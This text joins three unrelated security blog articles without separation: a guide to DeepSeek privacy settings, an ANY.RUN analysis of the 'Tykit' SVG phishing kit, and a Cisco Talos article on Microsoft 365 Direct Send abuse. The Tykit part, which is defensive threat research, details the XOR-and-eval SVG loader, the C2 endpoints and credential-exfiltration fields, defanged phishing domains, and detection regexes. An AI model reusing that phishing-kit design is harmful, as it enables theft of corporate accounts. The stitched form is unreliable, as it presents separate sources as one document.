We’ve previously written about why neural networks are not the best choice for private conversations. Popular chatbots like ChatGPT, DeepSeek, and Gemini collect user data for training by default, meaning developers can see all your secrets: every chat you have with the chatbot is stored on company servers. This is precisely why it’s essential to understand what data each neural network collects, and how to set each one up for maximum privacy.
In our previous post, we covered configuring ChatGPT’s privacy and security in abundant detail. Today, we examine the privacy settings in China’s answer to ChatGPT — DeepSeek. Curiously, unlike ChatGPT, it offers surprisingly few of them.
What data DeepSeek collects
All data from your interactions with the chatbot, images and videos included
Details you provide in your account
IP address and approximate location
Information about your device: type, model, and operating system
The browser you’re using
Information about errors
What’s troubling is that the company doesn’t specify how long it keeps personal data, operating instead on the principle of “retain it as long as needed”. The privacy policy states that the data retention period varies depending on why the data is collected, yet no time limit is mentioned. Is this not another reason to avoid sharing sensitive information with these neural networks? After all, dataset leaks containing users’ personal data have become an everyday occurrence in the world of AI.
If you want to keep your IP address private while you work with DeepSeek, use a trusted VPN, such as the one included in Kaspersky Security Cloud. Be wary of free VPN apps: threat actors frequently use them to create botnets (networks of compromised devices). Your smartphone or computer, and by extension, you yourself, could thus become an unwitting accomplice in actual crimes.
Who gets your data
DeepSeek is a company under Chinese jurisdiction, so not only the developers but also Chinese law enforcement — as required by local laws — may have access to your chats. Researchers have also discovered that some of the data ends up on the servers of China Mobile — the country’s largest mobile carrier.
However, DeepSeek is hardly an outlier here: ChatGPT, Gemini, and other popular chatbots just as easily and casually share user data upon a request from law enforcement.
Disabling DeepSeek’s training on your data
The first thing to do — a now-standard step when setting up any chatbot — is to disable training on your data. Why could this pose a threat to your privacy? Sometimes, large language models (LLMs) can accidentally disclose real data from the training set to other users. This happens because neural networks don’t distinguish between confidential and non-confidential information. Whether it’s a name, an address, a password, a piece of code, or a photo of kittens — it makes little difference to the AI. Although DeepSeek’s developers claim to have taught the chatbot not to disclose personal data to other users, there’s no guarantee this will never happen. Furthermore, the risk of dataset leaks is always there.
The web-based version and the mobile app for DeepSeek have different settings, and the available options vary slightly. First of all, note that the web version only offers three interface languages: English, Chinese, and System. The System option is supposed to use the language set as the default in your browser or operating system. Unfortunately, this doesn’t always work reliably with all languages. Therefore, if you need the ability to switch DeepSeek’s interface to a different language, we recommend using the mobile app, which has no issues displaying the selected user interface language. It’s important to note that your choice of UI language doesn’t affect the language you use to communicate with DeepSeek. You can chat with the bot in any language it supports. The chatbot itself proudly claims to support more than 100 languages — from common to rare.
DeepSeek web version settings
To access the data management settings, open the left sidebar, click the three dots next to your name at the bottom, select Settings, and then navigate to the Data tab in the window that appears. We suggest you disable the option labeled Improve the model for everyone to reduce the likelihood that your chats with DeepSeek will end up in its training datasets. If you want the model to stop learning from the data you shared with it before turning off this option, you’ll need to email privacy@deepseek.com, and specify the exact data or chats.
Disabling DeepSeek training on your data in the web-based version
DeepSeek mobile app settings
In the DeepSeek mobile app, likewise, open the left sidebar, tap the three dots next to your name at the bottom, and select Settings. In the menu, open the Data controls section and turn off Improve the model for everyone.
Disabling DeepSeek training on your data in the app
Managing DeepSeek chats
All your chats with DeepSeek — both in the web version and in the mobile app — are collected in the left sidebar. You can rename any chat by giving it a descriptive title, share it with anyone by creating a public link, or delete a specific chat entirely.
Sharing DeepSeek chats
The ability to share a chat might seem extremely convenient, but remember that it poses risks to your privacy. Let’s say you used DeepSeek to plan a perfect vacation, and now you want to share the itinerary with your travel companions. You could certainly create a public link in DeepSeek and send it to your friends. However, anyone who gets hold of that link can read your plan and learn, among other things, that you’ll be away from home on specific dates. Are you sure this is what you want?
If you’re using the chatbot for confidential projects (which is not advisable in the first place, as it’s better to use a locally running version of DeepSeek for this kind of data, but more on this later), sharing the chat, even with a colleague, is definitely not a good idea. In the case of ChatGPT, similar shared chats were at one point indexed by search engines — allowing anyone to find and read them.
If you absolutely must send the content of a chat to someone else, it’s easier to copy it by clicking the designated button below the message in the chat window, and then to use a conventional method like email or a messaging app to send it, rather than share it with the entire world.
If, despite our warnings, you still wish to share your conversation via a public link, this is currently only possible in the web version of DeepSeek. To create a link to a chat, click the three dots next to the chat name in the left sidebar, select Share, and then, on the main chat board, check the boxes next to the messages you want to share, or check the Select all box at the bottom. After this, click Create public link.
Sharing DeepSeek chats in the web version
You can view all the chats you have shared and, if necessary, delete their public links in the web version, by going to Settings → Data → Shared links → Manage.
Managing shared DeepSeek chats in the web version
Deleting old DeepSeek chats
Why should you delete old DeepSeek chats? The fewer chats you have saved, the lower the risk that your confidential data could become accessible to unauthorized parties if your account is compromised, or if there’s a bug in the LLM itself. Unlike ChatGPT, DeepSeek doesn’t remember or use data from your past chats in new ones, so deleting them won’t impact your future use of the neural network.
However, you can resume a specific chat with DeepSeek at any time by selecting it in the sidebar. Therefore, before deleting a chat, consider whether you might need it again later.
To delete a specific chat: in the web version, click the three dots next to the chat in the left sidebar; in the mobile app, press and hold the chat name. In the window that appears, select Delete.
To delete your entire conversation history: in the web version, go to Settings → Data → Delete all chats → Delete all; in the application, go to Settings → Data controls → Delete all chats. Bear in mind that this only removes the chats from your account without deleting your data from DeepSeek’s servers.
If you want to save the results of your chats with DeepSeek, in the web version, first go to Settings → Data → Export data → Export. Wait for the archive to be prepared, and then download it. All data is exported in JSON format. This feature is not available in the mobile app.
Managing your DeepSeek account
When you first access DeepSeek, you have two options: either sign up with your email and create a password, or log in with a Google account. From a security and privacy standpoint, the first option is better — especially if you create a strong, unique password for your account: you can use a tool like Kaspersky Password Manager to generate and safely store one.
You can subsequently log in with the same account in other browsers and on different devices. Your chat history will be accessible from any device linked to your account. So, if someone learns or steals your DeepSeek credentials, they’ll be able to review all your chats. Sadly, DeepSeek doesn’t yet support two-factor authentication or passkeys.
If you’ve even the slightest suspicion that your DeepSeek account credentials have been compromised, we recommend taking the following steps. Start by logging out of your account on all devices. In the web version, navigate to Settings → Profile → Log out of all devices → Log out. In the app, the path is Settings → Data controls → Log out of all devices. Next, you need to change your password, but DeepSeek doesn’t offer a direct path to do so once you’re logged in. To reset your password, go to the DeepSeek web version or mobile app, select the password login option, and click Forgot password?. DeepSeek will request your email address, send a verification code to that email, and allow you to reset the old password and create a new one.
Deploying DeepSeek locally
Privacy settings for the DeepSeek web version and mobile app are extremely limited and leave much to be desired. Fortunately, DeepSeek is an open-source language model. This means anyone can deploy the neural network locally on their computer. In this scenario, the AI won’t train on your data, and your information won’t end up on the company’s servers or with third parties. However, there’s a significant downside: when running the AI locally, you’ll be limited to the pre-trained model, and won’t be able to ask the chatbot to find up-to-date information online.
The simplest way to deploy DeepSeek locally is by using the LM Studio application. It allows you to work with models offline, and doesn’t collect any information from your chats with the AI. Download the application, click the search icon, and look for the model you need. The application will likely offer many different versions of the same model.
Searching LM Studio for DeepSeek models
These versions differ in the number of parameters, denoted by the letter B (for billions). The more parameters a model has, the more capable it is, and the more resources it needs to run smoothly. For comparison, a modern laptop with 16–32 GB of RAM is sufficient for lighter models (7B–13B), but for the largest version, with 70 billion parameters, you’d need to own an entire data center.
LM Studio will alert you if the model is too heavy for your device.
LM Studio warning you that the model may be too large for your device
It’s important to understand that local AI use is not a panacea in terms of privacy and security. It doesn’t hurt to periodically check that LM Studio (or another similar application) is not connecting to external servers. For example, you can use the netstat command for that. If you’re not familiar with netstat, simply ask the chatbot to tell you about today’s news. If the chatbot is running locally as designed, the response definitely won’t include any current events.
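If you’d like to script that check, below is a minimal sketch in Python using the third-party psutil package (install it with pip install psutil). It’s an illustration for spot-checks, not a complete audit tool, and it may require administrator or root privileges on some systems.

```python
# List established outbound connections with the owning process name, so you
# can spot-check whether a local LLM app (e.g., LM Studio) is phoning home.
import psutil

for conn in psutil.net_connections(kind="inet"):
    if conn.status == psutil.CONN_ESTABLISHED and conn.raddr:
        name = "unknown"
        if conn.pid:
            try:
                name = psutil.Process(conn.pid).name()
            except psutil.Error:
                pass
        print(f"{name:30} -> {conn.raddr.ip}:{conn.raddr.port}")
```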
How to use DeepSeek both privately and securely | Kaspersky official blog
Not long ago we reported a spike in phishing attacks that use an SVG file as the delivery vector. One striking detail was how the SVG embeds JavaScript that rebuilds the payload with XOR and then executes it directly via eval() to redirect victims to a phishing page.
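To make that pattern concrete, here is an illustrative Python model of the XOR-rebuild trick; the key and payload are invented stand-ins, not values taken from real samples.

```python
# The SVG ships an obfuscated byte blob; its embedded script XORs each byte
# with a key and passes the result to eval(). Same idea, modeled in Python.
KEY = 0x42
script = "window.location = 'https://example.com/landing';"

blob = bytes(b ^ KEY for b in script.encode())      # what the attacker embeds
rebuilt = bytes(b ^ KEY for b in blob).decode()     # what the browser executes
assert rebuilt == script
print(rebuilt)
```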
A quick look at the indicators we found showed that nearly all related cases used the same exfiltration addresses. Even more telling: the client-side logic and obfuscation techniques were unchanged across samples, and the communication with the C2 servers was implemented in several steps, with validation of the victim’s current authorization state at each stage.
All this suggests the threat has a certain level of maturity; it’s not just an unusual delivery method, but something that behaves like a phishing kit.
To test that hypothesis, measure the scale of the problem, and be able to tell this threat apart from others, we performed a technical analysis of the samples and labeled the family Tykit (Typical phishing kit). Here’s what we found.
Key Takeaways
The first samples appeared in ANY.RUN’s Interactive Sandbox in May 2025, with peak activity observed in September–October 2025.
The kit mimics Microsoft 365 login pages, targeting the corporate account credentials of numerous organizations.
The threat utilizes various evasion tactics like hiding code in SVGs or layering redirects.
The client-side code executes in several stages and uses basic anti-detection techniques.
The most affected industries include construction, professional services, IT, finance, government, telecom, real estate, and education, among others, across the US, Canada, LATAM, EMEA, Southeast Asia, and the Middle East.
Discovery & Pivoting: How ANY.RUN Detected the Threat
Beginning with the analysis session in the ANY.RUN Sandbox, we quickly found the artifacts needed to expand the context:
The same SVG image was used for redirection (SHA256: a7184bef39523bef32683ef7af440a5b2235e83e7fb83c6b7ee5f08286731892)
Fig. 1: Redirecting SVG image
The fake Microsoft 365 login page was hosted on the domain loginmicr0sft0nlineeckaf[.]52632651246148569845521065[.]cc; the URL contained the parameter /?s=, which could be useful for further searching.
A POST request was sent to the server segy2[.]cc, targeting the URL /api/validate and containing data in the request body.
The result was encouraging: 189 related analysis sessions, most of them with a Malicious verdict. The earliest analysis containing the searched indicators dates back to May 7, 2025:
Bingo! The same activity was observed several months earlier; phishing campaigns featuring URLs with the parameter /?s=, and requests sent to the server segy[.]cc, whose domain name is almost identical to the original one.
A search using domainName:"^segy." revealed a few more related domains:
Fig. 4: Additional segy domains
With several hundred submissions recorded between May and October 2025, all sharing nearly identical patterns, this could hardly be a coincidence. The template-based infrastructure, identical attack scenarios, and a set of URLs resembling C2 API endpoints: could this be a phishing kit?
It was necessary to analyze the JavaScript code from the phishing pages to see whether there were any recurring elements across samples, how sophisticated the code was, how many execution stages it included, and whether it implemented any mechanisms to prevent analysis.
Let’s look at another analysis session that reproduces the credentials-entry stage; a critical phase, because most phishing kits reveal themselves fully at the point of exfiltration:
Step 1: SVG as the delivery vector
The attack vector remains an SVG image that redirects the browser. The image uses the same design, but this time includes a working check-stub that prompts the user to “Enter the last 4 digits of your phone number” (in reality any value is accepted).
Fig. 6: SVG file with the “check”
Step 2: Trampoline and CAPTCHA stage
After the check is submitted, the page redirects to a trampoline script, which then forwards the browser to the main phishing page.
The value of the s= parameter is the victim’s email encoded in Base64.
Fig. 7: Trampoline code that forwards to the main phishing page
Next, a page with a CAPTCHA loads; the site uses the Cloudflare Turnstile widget as anti-bot protection.
Fig. 8: Anti-bot protection on the phishing page using Cloudflare Turnstile
It’s worth noting that the client-side code includes basic anti-debugging measures, for example, it blocks key combinations that open DevTools and disables the context menu.
Fig. 9: Basic anti-debug protections in the page source
Step 3: Credential capture and C2 logic
After the CAPTCHA is passed, the page reloads and renders a fake Microsoft 365 sign-in page.
At the same time, a background POST request is sent to the C2 server at /api/validate. The request body contains JSON with the following fields:
“key”: a session key, or possibly a “license” key for the phishing kit.
“redirect”: the URL to which the victim should be redirected.
“email”: the victim’s email address, decoded; present if the s= parameter was populated earlier.
The logic for sending the request, validating the response, and retrieving the next stage of the payload is implemented in an obfuscated portion of the page; after deobfuscation, it looks like this:
Fig. 10: Logic for sending and validating the victim’s email
The C2 server responds with a JSON object that contains:
“status”: the C2 verdict — “success” or “error”.
“message”: the next stage, provided as HTML.
“data”: {“email”}: the victim’s email address.
The next stage presents the password-entry form. The returned HTML also embeds obfuscated JavaScript that implements the logic for exfiltrating the stolen credentials to the C2 endpoint /api/login and for deciding the page’s next actions (for example: show an “Incorrect password” prompt, redirect the user to a legitimate site to hide the fraud, etc.).
A couple of notable snippets illustrate this behavior:
Fig. 11: Exfiltration of the victim’s login and password
The JSON sent in the POST /api/login request contains the following fields:
“key”: The key (see above for possible meaning).
“redierct”: The redirect URL (note the misspelling in the field name).
“token”: An authorization JWT. Notably, the sample token eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJiZjk5M2NkZS1mOTdiLTQyYTctODcxYy1lOTk1MDgzMmM5NjgiLCJleHAiOjE2OTkxNzc0NjF9.p9-OI0LCYcOjaU1I3TMZTjNSos50txbV3_Mi1jk1u8c decodes to an expired token (see the decoding sketch after this list); the exp claim is 1699177461, which corresponds to Sunday, November 5, 2023, 09:44:21 GMT.
“server”: The C2 server domain name.
“email”: The victim’s email address.
“password”: The victim’s password.
The server then uses these fields to determine what the victim sees next and whether additional actions (debugging hooks, logging, further redirects) are triggered.
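That expired-token claim is easy to verify: a JWT’s payload is just base64url-encoded JSON, so it can be inspected without the signing key. A minimal Python sketch (inspection only, no signature verification):

```python
import base64
import json
from datetime import datetime, timezone

token = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJzdWIiOiJiZjk5M2NkZS1mOTdiLTQyYTctODcxYy1lOTk1MDgzMmM5Njgi"
         "LCJleHAiOjE2OTkxNzc0NjF9."
         "p9-OI0LCYcOjaU1I3TMZTjNSos50txbV3_Mi1jk1u8c")

payload = token.split(".")[1]
payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
claims = json.loads(base64.urlsafe_b64decode(payload))
print(claims["exp"])                                           # 1699177461
print(datetime.fromtimestamp(claims["exp"], tz=timezone.utc))  # 2023-11-05 09:44:21+00:00
```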
The response to the POST /api/login request is a JSON object with the following fields:
“status”: “success” | “info” | “error”
“d”: “<HTML payload to be shown to the user>”
“message”: “Text such as ‘Incorrect password’ when the user enters the wrong password”
“data”: { “email”: “<victim email>” }
Behavior depends on the value of status:
“success”: Render the HTML payload found in “d” to the user.
“info”: Send a (likely debugging) POST request to /x.php on the C2 server. The logic for this flow is shown in the figure below.
“error”: Display an error message (for example, “Incorrect password”).
Fig. 12: Decision logic after the /api/login request
At this point the execution chain of the phishing page ends. In sum, the page implements a fairly involved execution mechanism: the payload is obfuscated, there are basic (nonetheless effective) anti-debugging measures, and the exfiltration logic runs through several staged steps.
Detection Rules for Identifying Tykit Activity
After analyzing the structure of the Tykit phishing payload and the requests sent during the attack, we developed a set of rules that allow detecting the threat at different stages of its implementation.
SVG files
Let’s start with the SVG images themselves. While embedding JavaScript in SVGs can enable legitimate functionality (for example, interactive survey forms, animations, or dynamic UI mockups), it’s frequently abused by threat actors to hide malicious payloads.
One common way to distinguish benign code from malicious is the presence of obfuscation; techniques that hinder triage and signature-based analysis by security tools and SOC analysts.
To improve detection rates for this vector (even without attributing samples to a specific actor), monitor for:
General signs of code obfuscation, e.g. frequent calls to atob(), parseInt(), charCodeAt(), fromCodePoint(), and generated variable names like var _0xABCDEF01 = … often produced by tools such as Obfuscator.io.
Use of the unsafe eval() call, which executes arbitrary code.
Script logic that redirects or alters the current document: calls to window.location.* or manipulation of href attributes.
Below is a code snippet taken from an SVG used to load Tykit’s phishing page:
Fig. 13: Malicious redirect code from an SVG that loads the Tykit phishing page
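Those heuristics translate directly into a simple triage script. The Python sketch below flags SVG files containing such markers; the pattern list is illustrative, not a complete signature set.

```python
import re
import sys

# Heuristic markers of obfuscated JavaScript inside an SVG (illustrative).
SUSPICIOUS = [
    r"\beval\s*\(",                 # direct execution of generated code
    r"\batob\s*\(",                 # base64 decoding
    r"\bcharCodeAt\b",              # byte-level string rebuilding
    r"\bfromCharCode\b|\bfromCodePoint\b",
    r"var\s+_0x[0-9a-fA-F]{4,}",    # Obfuscator.io-style variable names
    r"window\.location",            # redirect logic
]

def scan_svg(path: str) -> list[str]:
    with open(path, encoding="utf-8", errors="ignore") as fh:
        text = fh.read()
    return [pattern for pattern in SUSPICIOUS if re.search(pattern, text)]

if __name__ == "__main__":
    hits = scan_svg(sys.argv[1])
    print("suspicious markers:", hits if hits else "none")
```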
Domains
In nearly all cases linked to Tykit, the operators used templated domain names. For exfiltration servers we observed domains matching the ^segy?.* pattern, for example:
segy[.]zip
segy[.]xyz
segy[.]cc
segy[.]shop
segy2[.]cc
For the main servers hosting the phishing pages, aside from abuse of cloud and object-storage services, the operators frequently registered domains that appear to be generated by a DGA (domain-generation algorithm). These domains match a pattern like: ^loginmicr(o|0)s.*?\.([a-z]+)?\d+\.cc$
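Both patterns can be applied directly to candidate domains during triage. A short Python sketch (the expressions mirror the patterns above; tune them against your own telemetry before alerting on them):

```python
import re

SEGY_RE = re.compile(r"^segy")  # exfiltration servers: segy.zip, segy2.cc, ...
DGA_RE = re.compile(r"^loginmicr(o|0)s.*?\.([a-z]+)?\d+\.cc$")  # phishing hosts

for domain in [
    "segy2.cc",
    "loginmicr0sft0nlineeckaf.52632651246148569845521065.cc",
    "login.microsoftonline.com",
]:
    flagged = bool(SEGY_RE.search(domain) or DGA_RE.search(domain))
    print(f"{domain}: {'suspicious' if flagged else 'clean'}")
```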
To collect all IOCs and perform a detailed case analysis, see the TI Lookup query:
Finally, the main distinction between Tykit and many other phishing campaigns is the set of HTTP requests sent to the C2 that determine the next actions and handle exfiltration of victim data.
After analyzing the JavaScript used across samples, we identified the following requests:
GET /?s=<b64-encoded victim email>
A series of initial requests used to pass Cloudflare Turnstile and load the phishing page; the s parameter may be empty.
POST /api/validate
The first C2 request, used to validate the supplied email. The request body contains JSON with fields (see earlier):
“key”
“redirect”
“email”
The server responds with JSON containing:
“status”
“message” (next stage, as HTML)
“data”: {“email”}
POST /api/validate (variant)
A second variant of the validation request whose JSON body includes:
“key”
“redirect”
“token”
“server”
“email”
The response has the same structure as above.
POST /api/login
The data-exfiltration request. The JSON body contains:
“key”
“redierct” (sic — note the misspelling)
“token”
“server”
“email”
“password”
The response JSON instructs how to change the state of the phishing page and includes:
“status”
“d” (HTML payload to render)
“message”
“data”: {“email”}
POST /x.php
Likely a debugging/logging endpoint triggered when the previous /api/login response contains “status”: “info”. The JSON body includes:
“id”
“key”
“config”
The format of the server’s response to this request was not determined during the investigation.
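Taken together, these endpoints and field names form a compact detection heuristic. The sketch below assumes you can feed it the URL path and parsed JSON body of an outbound POST from proxy or sandbox logs; treat it as a starting point, not a full signature.

```python
TYKIT_PATHS = {"/api/validate", "/api/login", "/x.php"}

def looks_like_tykit(path: str, body: dict) -> bool:
    """Match a request against the Tykit C2 patterns described above."""
    if path not in TYKIT_PATHS:
        return False
    if path == "/api/login":
        # The misspelled "redierct" field is a strong marker of this stage.
        return "redierct" in body and {"email", "password"} <= body.keys()
    if path == "/api/validate":
        return {"key", "redirect"} <= body.keys() or {"key", "email"} <= body.keys()
    return {"id", "key", "config"} <= body.keys()  # /x.php debugging beacon

print(looks_like_tykit(
    "/api/login",
    {"key": "k", "redierct": "https://example.com",
     "email": "user@company.com", "password": "hunter2"},
))  # True
```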
Who’s Being Targeted
We collected several signals about the industries and countries targeted by Tykit.
Most affected countries:
United States
Canada
South-East Asia
LATAM / South America
EU countries
Middle East
Targeted industries:
Construction
Professional services
IT
Agriculture
Commerce / Retail
Real estate
Education
Design
Finance
Government & military
Telecom
There are no unusual TTPs to call out; this is another wave of spearphishing aimed at stealing Microsoft 365 credentials, featuring a multi-stage execution chain and the capability for AitM interception.
Taken together, given the wide geographic and industry spread and the TTPs that match standard phishing kit behavior, the threat has been active for quite some time. It appears to be a typical PhaaS-style framework (hence the name TYpical phishKIT, or Tykit). Time will tell how it evolves.
How Tykit Affects Organizations
Tykit is a credential-theft campaign that targets Microsoft 365 accounts via a multi-stage phishing flow. Successful compromises can lead to:
Data exfiltration from mailboxes, drives, and connected SaaS apps.
Lateral movement inside environments where cloud identities map to internal resources.
AitM interception of MFA or session tokens, increasing the chance of bypassing second-factor protections.
Operational and reputational damage (incident response costs, regulatory exposure, loss of client trust).
Sectors at higher risk reflect the campaign’s targeting: construction, professional services, IT, finance, government, telecom, real estate, education, and others across the US, Canada, LATAM, EMEA, Southeast Asia, and the Middle East.
How to Prevent Tykit Attacks
Tykit doesn’t reinvent phishing, but it shows how small technical tweaks, like hiding code in SVGs or layering redirects, can make attacks harder to catch. Still, with better visibility and the right tools, teams can stop it before credentials are stolen.
Strengthen email and file security
SVG files may look safe but can hide JavaScript that executes in the browser. Ensure your security gateway actually inspects SVG content, not just extensions. Use sandbox detonation and Content Disarm & Reconstruction (CDR) to uncover hidden payloads. The ANY.RUN Sandbox is particularly effective for detonating such files and exposing their redirects, scripts, and network calls in seconds.
Use phishing-resistant MFA
Tykit highlights how traditional MFA can be bypassed. Switch to phishing-resistant methods like FIDO2 or certificate-based MFA, disable legacy protocols, and enforce Conditional Access in Microsoft 365. Reviewing OAuth app consents and token lifetimes regularly helps minimize exposure.
Monitor for key indicators
Watch for outbound requests to domains such as segy* or loginmicr(o|0)s.*\.cc, and POST requests to /api/validate, /api/login, or /x.php. ANY.RUN’s Threat Intelligence Lookup can quickly connect these IOCs to related phishing activity, giving analysts context in minutes.
Automate detection and threat hunting
Configure your SIEM or XDR to alert on suspicious Base64 query parameters (like /?s=) or requests following Tykit’s structure. Integrating ANY.RUN’s Threat Intelligence Feeds ensures that new indicators (fresh domains, hashes, and URL patterns) are automatically available for detection.
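As one building block for such a rule, the Python sketch below tests whether a URL’s s= parameter base64-decodes to an email address; the sample URL is fabricated.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

def s_param_is_b64_email(url: str) -> bool:
    """Return True if the s= query parameter decodes to an email address."""
    for value in parse_qs(urlparse(url).query).get("s", []):
        value += "=" * (-len(value) % 4)  # restore any stripped padding
        try:
            decoded = base64.b64decode(value, validate=True).decode("utf-8")
        except Exception:
            continue
        if re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", decoded):
            return True
    return False

print(s_param_is_b64_email("https://example.com/?s=dXNlckBjb21wYW55LmNvbQ=="))  # True
```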
Educate and respond fast
Regular awareness training helps users recognize that even “image” files can trigger phishing chains. If an incident occurs, isolate affected accounts, revoke sessions, and reset credentials.
Using ANY.RUN’s Interactive Sandbox during incident response can accelerate this process: analysts can safely replay the infection chain, confirm what data was exfiltrated, and extract accurate IOCs within minutes. This shortens MTTR and helps strengthen detections for the next wave of similar campaigns.
Conclusion: Lessons from a “Typical” Phishing Kit
We reviewed another sobering example of how phishing remains front and center in the cyber-threat landscape, and how regularly new tools appear to carry out these attacks; each one differing from its predecessors in some way.
We labeled this example Tykit, examined its technical details, and derived several detection and hunting rules that, taken together, will help detect new samples and monitor the campaign’s evolution.
Tykit doesn’t include a full arsenal of evasion and anti-detection techniques, but, like its more mature counterparts, it implements AitM-style data interception and methods to bypass multi-factor protections. It also relies on a quasi-distributed network architecture: servers are assigned dynamic domain names and roles are separated between “delivery” and “exfiltration.”
Empowering Faster Analysis with ANY.RUN
Investigating campaigns like Tykit can be time-consuming, from detecting a single suspicious SVG to uncovering the entire phishing infrastructure behind it. ANY.RUN helps analysts turn hours of manual work into minutes of interactive analysis.
Here’s how:
See the full attack chain in under 60 seconds. Detonate SVGs, phishing pages, or any other file type in real time and instantly observe redirects, scripts, and payload execution.
Reduce investigation time. With live network mapping, script deobfuscation, and dynamic IOCs, analysts can skip static triage and focus directly on what matters.
Cut MTTR by more than 20 minutes per case. Quick visibility into C2 communications, credential-capture logic, and data exfiltration flows allows teams to respond faster and with higher confidence.
Boost proactive defense. Using ANY.RUN Threat Intelligence Lookup, SOC teams can pivot from a single domain or hash to hundreds of related submissions, revealing shared infrastructure and campaign patterns to enrich detection rules for catching future attacks.
Strengthen detections with fresh intelligence. Automatically enrich your security tools with new indicators with TI Feeds sourced from live sandbox analyses and community contributions.
For SOC teams, MSSPs, and threat researchers, ANY.RUN provides the speed, depth, and context needed to stay ahead of campaigns like Tykit, and the next one that follows.
Over 500,000 cybersecurity professionals and 15,000+ companies in finance, manufacturing, healthcare, and other sectors rely on ANY.RUN to streamline malware investigations worldwide.
Speed up triage and response by detonating suspicious files in ANY.RUN’s Interactive Sandbox, observing malicious behavior in real time, and gathering insights for faster, more confident security decisions. Paired with Threat Intelligence Lookup and Threat Intelligence Feeds, it provides actionable data on cyberattacks to improve detection and deepen your understanding of evolving threats.
Tykit Analysis: New Phishing Kit Stealing Hundreds of Microsoft Accounts in Finance
Microsoft 365 Exchange Online’s Direct Send is designed to solve an enterprise-scale operational challenge: certain devices and legacy applications, such as multifunction printers, scanners, building systems, and older line-of-business apps, need to send email into the tenant but lack the ability to authenticate properly. Direct Send preserves business workflows by allowing messages from these appliances to bypass more rigorous authentication and security checks.
Unfortunately, Direct Send’s ability for content to bypass standard security checks makes it an attractive target for exploitation. Cisco Talos has observed increased activity by malicious actors leveraging Direct Send as part of phishing campaigns and business email compromise (BEC) attacks. Public research from the broader community, including reporting by Varonis, Abnormal Security, Ironscales, Proofpoint, Barracuda, Mimecast, Arctic Wolf, and others, agrees with Cisco Talos’ findings: adversaries have actively targeted corporations using Direct Send in recent months.
Microsoft, for its part, has already introduced a Public Preview of the RejectDirectSend control and signaled future improvements, such as Direct Send-specific usage reports and an eventual “default-off” posture for new tenants. These ongoing enhancements, layered with existing security controls, are helping organizations strengthen their defenses while still supporting the business-critical workflows that Direct Send was designed to enable.
How Direct Send is exploited
Direct Send abuse is the opportunistic exploitation of a trusted pathway. Adversaries emulate device or application traffic and send unauthenticated messages that appear to originate from internal accounts and trusted systems. The research cited above describes recurring techniques, such as:
Impersonating internal users, executives, or IT help desks (e.g., observed by Abnormal and Varonis)
Business-themed lures, such as task approvals, voicemail or service notifications, and wire or payment prompts (e.g., Proofpoint’s observations about social engineering payloads)
QR codes embedded in PDFs and low-content or empty-body messages carrying obfuscated attachments used to bypass traditional content filters and drive the user to credential harvesting pages (e.g., highlighted in Ironscales, Barracuda, and Mimecast reporting)
Use of trusted Exchange infrastructure and legitimate SMTP flows to inherit implicit trust and decrease payload scrutiny
“What happens when a feature built for convenience becomes an attacker’s perfect disguise?” – Abnormal Security, framing the dual‑use nature of Direct Send.
Legitimate dependencies still exist. Many enterprises have not fully migrated older scanning or workflow systems to authenticated submission (SMTP AUTH) or to partner connectors. A hasty blanket disablement without visibility and change planning can disrupt invoice processing, document distribution, or facilities notifications. That’s precisely why Microsoft is building reporting to help administrators sequence risk reduction without accidental business impact.
Examples
Figure 1. Spoofed American Express dispute (left), fake ACH payment notice (right).
The examples in Figure 1 (victim information redacted) show blatant attacks whose messages were presumed to be internal and therefore bypassed the sender verification that could have convicted these threats.
Direct Send bypasses sender verification
There are three key elements to email domain sender verification:
DomainKeys-Identified Mail (DKIM) is a cryptographic signature of message headers and content. This can verify that the message was sent by a server with a key authorized by the owner of the sending domain.
Sender Policy Framework (SPF) specifies a list of IP ranges that are authorized to send on behalf of the domain.
Domain-based Message Authentication, Reporting and Conformance (DMARC) defines what to do with a domain’s noncompliant mail when it lacks a DKIM signature and SPF authorization. Senders can choose a DMARC policy that instructs recipients to reject this mail. This is increasingly common, especially with banks.
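To illustrate, simplified SPF and DMARC DNS TXT records might look like the following; example.com, the IP range, and the report address are placeholders, and the include covers Microsoft 365’s sending infrastructure:

```
example.com.         TXT  "v=spf1 ip4:203.0.113.0/24 include:spf.protection.outlook.com ~all"
_dmarc.example.com.  TXT  "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
```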
Had the previous examples in Figure 1 been scanned with DMARC, DKIM, and SPF, they would have been rejected. However, Direct Send prevents this sort of inspection.
Mitigation and recommendations
With Direct Send abuse becoming more prevalent, it is critical for organizations to review their security posture related to Direct Send. Aligning with Microsoft’s guidance and community findings, Talos recommends:
Disable or restrict Direct Send where feasible.
Inventory current reliance. Although forthcoming Microsoft reporting should make this more streamlined, start by creating or reviewing internal device inventories, SPF records, and connector configs.
Enable Set-OrganizationConfig -RejectDirectSend $true once you’ve validated mail flows for legitimate internal traffic (see the PowerShell sketch after this list).
Migrate devices to authenticated SMTP.
Prefer authenticated SMTP client submission (port 587) for devices and applications that can store modern credentials or leverage app-specific identities (Microsoft documentation).
Use SMTP relays with tightly scoped source IP restrictions only for devices that are unable to use authenticated submission.
Implement partner/inbound connectors for approved senders.
Establish certificate or IP-based partner connectors for third-party services legitimately sending with your accepted domains.
Strengthen authentication and alignment.
Maintain SPF with required authorized sending IPs; adopt Soft Fail (~all) per guidance from the Messaging, Malware and Mobile Anti-Abuse Working Group (M³AAWG) as well as Microsoft.
Enforce DKIM signing and monitor DMARC aggregate reports for anomalous internal-looking unauthenticated traffic.
Strengthen policy, access, and monitoring.
Restrict egress on port 25 from general user segments; only designated hosts should originate SMTP traffic.
Use Conditional Access or equivalent policies to block legacy authentication paths that are no longer justified.
Alert on unexpected internal domain messages lacking authentication.
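For the RejectDirectSend step referenced above, a minimal Exchange Online PowerShell sketch might look like this; it assumes the ExchangeOnlineManagement module is installed and that legitimate Direct Send usage has already been inventoried.

```powershell
# Connect to Exchange Online (requires the ExchangeOnlineManagement module).
Connect-ExchangeOnline

# Review the current setting before changing anything.
Get-OrganizationConfig | Format-List RejectDirectSend

# Reject unauthenticated Direct Send messages tenant-wide.
Set-OrganizationConfig -RejectDirectSend $true
```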
“You can’t block what you don’t see.” – Ironscales, on visibility as a prerequisite to confident enforcement
